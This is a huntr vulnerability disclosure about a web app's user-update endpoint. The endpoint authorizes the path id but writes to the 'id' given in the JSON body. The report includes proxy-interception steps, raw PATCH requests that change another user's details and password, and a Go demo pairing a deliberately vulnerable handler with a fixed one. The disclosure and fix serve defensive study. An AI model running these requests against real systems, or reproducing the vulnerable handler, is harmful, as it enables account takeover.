huntr 23856E7E-94FF-4DEE-97D0-0CD47E9B8FF6 (reported by ibarrionuevo)
Published: Dec 21, 2022 - 1:27 a.m.

A user can update the information / password of other users

2022-12-21 01:27:28
Reporter: ibarrionuevo
Source: www.huntr.dev
Tags: user modification, password change, web proxy interception, information security

EPSS: 0.001 (Low), percentile 34.8%

Description

A normal user (neither admin nor host) can modify the nickname, username, email and password of other users without permission. The PATCH /api/user/:id endpoint validates the id in the path against the session user, but applies the update to whichever user id is supplied in the "id" field of the JSON body, so a request authenticated as the attacker, addressed to the attacker's own path id, can rewrite another user's record.

Steps to Reproduce

  1. Login as user A (here called "ileana.maricel", HOST role).
  2. In another browser, login as user B (called "ileana.mariceel", USER role) and copy B's session cookie.
  3. As user A, go to Setting -> Update Information.
  4. Change nickname, username and/or email.
  5. When selecting Save, intercept the request with a web proxy and replace the Cookie header with User B's cookie value. Also change the id in the path to User B's id (2), otherwise the request fails the path-id validation. Leave the "id" field in the JSON body as User A's id (1):

     PATCH /api/user/2 HTTP/1.1
     Host: localhost:5230
     Content-Type: application/json
     Cookie: memos_session=MTY3MTU3OTA0MXxEdi1CQkFFQ180SUFBUkFCRUFBQUh2LUNBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBSUFCQT09fOcAjJ2GPp5-cAXssL0lYKwcUk2hOR1JVz35py1Cn8sK
     Connection: close

     {"id":1,"nickname":"ileana.maricel.edited",
     "username":"ileana.maricel.username.modified","email":"[email protected]"}

  6. Send the request and see that the information has changed for user A, even though the session belongs to user B and the path names user B.

Figure 1

  7. The password of other users can be changed the same way. Go to Setting -> Change Password in User A's session.
  8. Enter the required values and select Save, intercepting the request.
  9. Replace the cookie with the one from User B.
  10. Also change the path id to 2 (User B's id) so that the validations pass; the body still carries "id":1.
  11. Send the request (the endpoint is the same one used for updating information) and see that the password has been changed for User A:

     PATCH /api/user/2 HTTP/1.1
     Host: localhost:5230
     Content-Type: application/json
     Cookie: memos_session=MTY3MTU3OTA0MXxEdi1CQkFFQ180SUFBUkFCRUFBQUh2LUNBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBSUFCQT09fOcAjJ2GPp5-cAXssL0lYKwcUk2hOR1JVz35py1Cn8sK
     Connection: close

     {"id":1,"password":"Changed"}

Figure 2

  12. Log out from User A and try to login with the original credentials for this same user: it is no longer possible.

Figure 3
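The access-control flaw these steps exercise, as an added Go example that is not part of the report or of the memos code base. It assumes a handler layout (a userPatch struct decoded straight from the JSON body whose ID field has no json:"-" tag, a memos_session cookie mapped to a user id, and a HOST/USER role check on the path id) and constructs two users and two cookie values; the real project's code may differ. Replay sends the report's request (B's cookie, B's id in the path, A's id in the body) against the vulnerable handler and against a fixed one that always takes the target from the authorized path id.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strconv"
	"strings"
)

// User is a minimal stand-in for the application's user record (constructed for this example).
type User struct {
	ID       int
	Role     string // "HOST" or "USER"
	Username string
	Password string // plaintext only because this is a demo; real code stores a hash
}

// userPatch is the struct the JSON body is decoded into. ID carries no json:"-" tag, so
// encoding/json fills it from a client-supplied "id" key (key matching is case-insensitive).
type userPatch struct {
	ID       int
	Username *string `json:"username"`
	Password *string `json:"password"`
}

// Store is an in-memory user table; sessions maps cookie values to user IDs (both constructed).
type Store struct{ users map[int]*User }

var sessions = map[string]int{"cookie-of-A": 1, "cookie-of-B": 2}

func NewStore() *Store {
	return &Store{users: map[int]*User{
		1: {ID: 1, Role: "HOST", Username: "ileana.maricel", Password: "A-original"},
		2: {ID: 2, Role: "USER", Username: "ileana.mariceel", Password: "B-original"},
	}}
}

// apply writes the patch to the row named by p.ID, exactly as a store layer would.
func (s *Store) apply(p userPatch) bool {
	u, ok := s.users[p.ID]
	if !ok {
		return false
	}
	if p.Username != nil {
		u.Username = *p.Username
	}
	if p.Password != nil {
		u.Password = *p.Password
	}
	return true
}

// Handler serves PATCH /api/user/:id. With fixed=false the access check runs on the path id,
// but the row that is written is chosen by the body's "id": the bug the report describes.
func (s *Store) Handler(fixed bool) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		c, err := r.Cookie("memos_session")
		if err != nil {
			http.Error(w, "missing session", http.StatusUnauthorized)
			return
		}
		callerID, ok := sessions[c.Value]
		if !ok {
			http.Error(w, "bad session", http.StatusUnauthorized)
			return
		}
		pathID, err := strconv.Atoi(strings.TrimPrefix(r.URL.Path, "/api/user/"))
		if err != nil {
			http.Error(w, "bad id", http.StatusBadRequest)
			return
		}
		// This check is why the PoC has to put B's own id in the path.
		if s.users[callerID].Role != "HOST" && callerID != pathID {
			http.Error(w, "forbidden", http.StatusForbidden)
			return
		}
		var p userPatch
		if err := json.NewDecoder(r.Body).Decode(&p); err != nil {
			http.Error(w, "bad json", http.StatusBadRequest)
			return
		}
		if fixed || p.ID == 0 {
			p.ID = pathID // fixed: the authorized target always overrides the body's "id"
		}
		if !s.apply(p) {
			http.Error(w, "no such user", http.StatusNotFound)
			return
		}
		w.WriteHeader(http.StatusNoContent)
	})
}

// Replay sends the report's request (B's cookie, B's id in the path, A's id in the body)
// and returns the status plus copies of both rows afterwards.
func Replay(fixed bool) (int, User, User) {
	s := NewStore()
	body := `{"id":1,"username":"ileana.maricel.username.modified","password":"Changed"}`
	req := httptest.NewRequest(http.MethodPatch, "/api/user/2", strings.NewReader(body))
	req.Header.Set("Content-Type", "application/json")
	req.AddCookie(&http.Cookie{Name: "memos_session", Value: "cookie-of-B"})
	rec := httptest.NewRecorder()
	s.Handler(fixed).ServeHTTP(rec, req)
	return rec.Code, *s.users[1], *s.users[2]
}

func main() {
	for _, fixed := range []bool{false, true} {
		status, a, b := Replay(fixed)
		fmt.Printf("fixed=%v status=%d A=%s/%s B=%s/%s\n",
			fixed, status, a.Username, a.Password, b.Username, b.Password)
	}
}
```

With fixed=false the request returns 204 and user 1 (the HOST) ends up with the modified username and the password "Changed" while user 2 is untouched; with fixed=true the same request only updates user 2, the caller's own row. The fix is deliberately not "reject bodies that carry an id": overriding the target with the authorized path id (or tagging the field json:"-") closes the hole even if a future client starts sending the field legitimately.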

